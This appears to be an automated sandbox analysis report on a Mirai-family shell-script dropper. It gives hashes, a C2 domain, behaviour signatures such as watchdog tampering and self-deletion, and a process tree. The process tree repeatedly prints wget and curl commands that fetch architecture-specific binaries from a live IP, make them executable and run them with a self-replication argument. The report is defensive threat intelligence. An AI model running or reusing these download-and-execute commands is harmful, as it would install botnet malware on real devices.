Analysis
-
max time kernel
131s -
max time network
149s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
12/03/2025, 03:42
Static task
static1
Behavioral task
behavioral1
Sample
dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
-
Size
2KB
-
MD5
4f730f218d22e79270dd5af7df77d761
-
SHA1
59cfd55256c70085ab0110c9680057f16401e235
-
SHA256
dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31
-
SHA512
77f5348af4e4b4f549109be0e8fdc37ad0791ff4e262fb5c811d3508de9c21d54131ba09a6703269baff71b863a25c67a53441e9aefa130e289dc9fc6eccb4d6
Malware Config
Extracted
mirai
UNSTABLE
dasdv1.service1921.club
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1566 chmod 1493 chmod 1500 chmod 1519 chmod 1525 chmod 1531 chmod 1537 chmod 1549 chmod 1555 chmod 1506 chmod 1513 chmod 1543 chmod 1560 chmod -
Deletes itself 1 IoCs
pid Process 1494 dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/WTH 1494 dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh /tmp/WTH 1501 dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh /tmp/WTH 1507 dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh /tmp/WTH 1514 dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh /tmp/WTH 1520 dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh /tmp/WTH 1526 dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh /tmp/WTH 1532 dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh /tmp/WTH 1538 dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh /tmp/WTH 1544 dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh /tmp/WTH 1550 dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh /tmp/WTH 1556 dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh /tmp/WTH 1561 dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh /tmp/WTH 1567 dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh File opened for modification /dev/misc/watchdog dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh -
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh File opened for modification /bin/watchdog dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh -
resource yara_rule behavioral1/files/fstream-1.dat upx behavioral1/files/fstream-4.dat upx behavioral1/files/fstream-5.dat upx behavioral1/files/fstream-6.dat upx behavioral1/files/fstream-7.dat upx -
Changes its process name 1 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 1494 dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh -
description ioc Process File opened for reading /proc/self/exe dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh File opened for reading /proc/self/maps dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1496 wget 1498 curl 1499 cat -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/WTH dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh File opened for modification /tmp/EdiAf.mips wget File opened for modification /tmp/EdiAf.mips curl File opened for modification /tmp/EdiAf.mpsl wget File opened for modification /tmp/EdiAf.arm6 wget File opened for modification /tmp/EdiAf.arm7 curl File opened for modification /tmp/EdiAf.i686 curl File opened for modification /tmp/EdiAf.arc curl File opened for modification /tmp/EdiAf.x86 curl File opened for modification /tmp/EdiAf.mpsl curl File opened for modification /tmp/EdiAf.arm5 wget File opened for modification /tmp/EdiAf.ppc wget File opened for modification /tmp/EdiAf.m68k wget File opened for modification /tmp/EdiAf.m68k curl File opened for modification /tmp/EdiAf.spc curl File opened for modification /tmp/EdiAf.arm6 curl File opened for modification /tmp/EdiAf.x86 wget File opened for modification /tmp/EdiAf.arm curl File opened for modification /tmp/EdiAf.arm5 curl File opened for modification /tmp/EdiAf.ppc curl File opened for modification /tmp/EdiAf.spc wget File opened for modification /tmp/EdiAf.arm wget File opened for modification /tmp/EdiAf.arm7 wget File opened for modification /tmp/EdiAf.sh4 wget File opened for modification /tmp/EdiAf.sh4 curl
Processes
-
/tmp/dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh/tmp/dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh1⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
- Reads runtime system information
- Writes file to tmp directory
PID:1477 -
/usr/bin/wgetwget http://78.40.117.13/EdiAf.x862⤵
- Writes file to tmp directory
PID:1479
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.x862⤵
- Writes file to tmp directory
PID:1491
-
-
/bin/catcat EdiAf.x862⤵PID:1492
-
-
/bin/chmodchmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH2⤵
- File and Directory Permissions Modification
PID:1493
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1496
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1498
-
-
/bin/catcat EdiAf.mips2⤵
- System Network Configuration Discovery
PID:1499
-
-
/bin/chmodchmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.mips EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH2⤵
- File and Directory Permissions Modification
PID:1500
-
-
/tmp/WTH./WTH zte.selfrep2⤵PID:1501
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.mpsl2⤵
- Writes file to tmp directory
PID:1503
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.mpsl2⤵
- Writes file to tmp directory
PID:1504
-
-
/bin/catcat EdiAf.mpsl2⤵PID:1505
-
-
/bin/chmodchmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.mips EdiAf.mpsl EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH2⤵
- File and Directory Permissions Modification
PID:1506
-
-
/tmp/WTH./WTH zte.selfrep2⤵PID:1507
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm2⤵
- Writes file to tmp directory
PID:1509
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm2⤵
- Writes file to tmp directory
PID:1511
-
-
/bin/catcat EdiAf.arm2⤵PID:1512
-
-
/bin/chmodchmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.mips EdiAf.mpsl EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH2⤵
- File and Directory Permissions Modification
PID:1513
-
-
/tmp/WTH./WTH zte.selfrep2⤵PID:1514
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm52⤵
- Writes file to tmp directory
PID:1516
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm52⤵
- Writes file to tmp directory
PID:1517
-
-
/bin/catcat EdiAf.arm52⤵PID:1518
-
-
/bin/chmodchmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.mips EdiAf.mpsl EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/WTH./WTH zte.selfrep2⤵PID:1520
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm62⤵
- Writes file to tmp directory
PID:1522
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm62⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/catcat EdiAf.arm62⤵PID:1524
-
-
/bin/chmodchmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.mips EdiAf.mpsl EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/WTH./WTH zte.selfrep2⤵PID:1526
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm72⤵
- Writes file to tmp directory
PID:1528
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm72⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/catcat EdiAf.arm72⤵PID:1530
-
-
/bin/chmodchmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH2⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/WTH./WTH zte.selfrep2⤵PID:1532
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.ppc2⤵
- Writes file to tmp directory
PID:1534
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.ppc2⤵
- Writes file to tmp directory
PID:1535
-
-
/bin/catcat EdiAf.ppc2⤵PID:1536
-
-
/bin/chmodchmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH2⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/WTH./WTH zte.selfrep2⤵PID:1538
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.m68k2⤵
- Writes file to tmp directory
PID:1540
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.m68k2⤵
- Writes file to tmp directory
PID:1541
-
-
/bin/catcat EdiAf.m68k2⤵PID:1542
-
-
/bin/chmodchmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH2⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/WTH./WTH zte.selfrep2⤵PID:1544
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.spc2⤵
- Writes file to tmp directory
PID:1546
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.spc2⤵
- Writes file to tmp directory
PID:1547
-
-
/bin/catcat EdiAf.spc2⤵PID:1548
-
-
/bin/chmodchmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH2⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/WTH./WTH zte.selfrep2⤵PID:1550
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.i6862⤵PID:1552
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.i6862⤵
- Writes file to tmp directory
PID:1553
-
-
/bin/catcat EdiAf.i6862⤵PID:1554
-
-
/bin/chmodchmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH2⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/WTH./WTH zte.selfrep2⤵PID:1556
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.sh42⤵
- Writes file to tmp directory
PID:1557
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.sh42⤵
- Writes file to tmp directory
PID:1558
-
-
/bin/catcat EdiAf.sh42⤵PID:1559
-
-
/bin/chmodchmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH2⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/WTH./WTH zte.selfrep2⤵PID:1561
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arc2⤵PID:1563
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arc2⤵
- Writes file to tmp directory
PID:1564
-
-
/bin/catcat EdiAf.arc2⤵PID:1565
-
-
/bin/chmodchmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arc EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH2⤵
- File and Directory Permissions Modification
PID:1566
-
-
/tmp/WTH./WTH zte.selfrep2⤵PID:1567
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30KB
MD5e932653d32b429c51de2046623fa71d2
SHA132ecc535e6cf6e99f105835d4a7cb75ef4cb233a
SHA25687dd914f28847f21e680b74700b0b4b339eb8f301677b53b1dddf8ffa2f33612
SHA512e284ce814a09b33a108507645c88845aa478e05d7925742e09f190f4c733630429e9f9460c76b9e3b6ec17eddc3110e8283e515891bcaea4ce0307509fbe84c2
-
Filesize
33KB
MD5029a7185777b7f885a6c3807e46b7365
SHA187372b0029b72446861c7b429e3ef1626c337218
SHA25642c2075a2803b78355f68b9d651a7bd154e5b61f62418d84a3b4d064b5c68a7d
SHA5124890cb74a283c03d790ffe4f2e5fbc06d82d5943773874c00c48171000cb21891720a57eb22e036cd2324e28b476a38f61c29f0d05d2949c2f4c8cdb971779a8
-
Filesize
35KB
MD57327f58c0e15f6086301a81780e100dc
SHA1292bb04ad4df407ac687ef1df1071659708bd3bb
SHA256b9f12d8c72d2a2a7263e1a7c2947e3891212b3566aae1b873212c6031e02de4d
SHA5124cc238acfd72556b2453f4d2880ccc3b2f00d0899c98a6b7eeee7cb139b242b318b8483b3bc70f96ca23934719f2152712d0efb8d9a1c950a0c98eed02452911
-
Filesize
32KB
MD5addb1cd662dd870b9b7ed5273d6fa76e
SHA16e12f9d5128a0de23d4b4b0dbfbefb91ff09dfc0
SHA256cee6e1cc48f81462d1668be2c341d7cc84b24e20e1747be03ad7e296434bffe7
SHA51228525de6add0d53f05e3c7c1e7d84927f40aee8c24d531216b6a77aa0f0a11fddd67b7f41b9eccc9b6692579a0c0f7453145480f7f8bacdd5d7ab13ffaad2d4f
-
Filesize
21KB
MD5a117b1b367633cb07f0795bd5f0c6f8f
SHA132bfac42c7134383c6381b94c0d75317fcb56d11
SHA25640fe55ff37dfaa1eded6d4a0d28994f7eaa4f36c384676bf3587349390a800f0
SHA5127e9e4ac7b911b44f40eb14f684bac76478e95085ac0cc393dac95fa312057e9c4f1a3508338098026bd1369179cccae91ca07092024201b3619fdc4401a25726
-
Filesize
75KB
MD5642dff628df548a6c458f004fd3b5aa1
SHA1cfd38a2a7522ed9637978f6f2c6ba117d60a9ec7
SHA256219f1a94474530ae2502631dabb897e1442ce2b535728f36e7eb5153ae2228ed
SHA512dc4ae205c670da0ead108aa30eb7627fab0a11fe4c47ce2c66042f89ef0ba4f52792d8217d98852e0c471f071079bb76bc4b975e32a018e3a5eeceb98c33f851